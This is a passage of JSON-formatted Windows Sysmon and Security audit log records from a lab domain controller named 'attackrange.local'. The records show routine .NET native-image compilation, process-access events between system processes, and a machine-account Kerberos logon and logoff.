05:57:56.916","ProcessGuid":"{A837DB8D-045A-5F25-0000-001009570C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\PresentationCore.dll","CreationUtcTime":"2020-08-01 05:57:56.916","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.151\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0465-5F25-0000-0010436B0C00}\r\nTargetProcessId: 2784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.151","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0465-5F25-0000-0010436B0C00}","TargetProcessId":"2784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.151\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0465-5F25-0000-0010436B0C00}\r\nTargetProcessId: 2784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.151","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0465-5F25-0000-0010436B0C00}","TargetProcessId":"2784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.151\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0465-5F25-0000-0010436B0C00}\r\nTargetProcessId: 2784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.151","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0465-5F25-0000-0010436B0C00}","TargetProcessId":"2784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.807\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.807","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.807\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.807","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:57.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0465-5F25-0000-001005700C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:57.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0465-5F25-0000-001005700C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220714,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xC7564\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xc7564","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220715,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xC7564\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t55031\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xc7564","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"55031","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220716,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xC7564\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xc7564","LogonType":"3","EventReceivedTime":"2020-08-01 05:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:13.495\r\nProcessGuid: {A837DB8D-0465-5F25-0000-001005700C00}\r\nProcessId: 4344\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f8-0\\PresentationFramework.dll\r\nCreationUtcTime: 2020-08-01 05:58:13.495","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 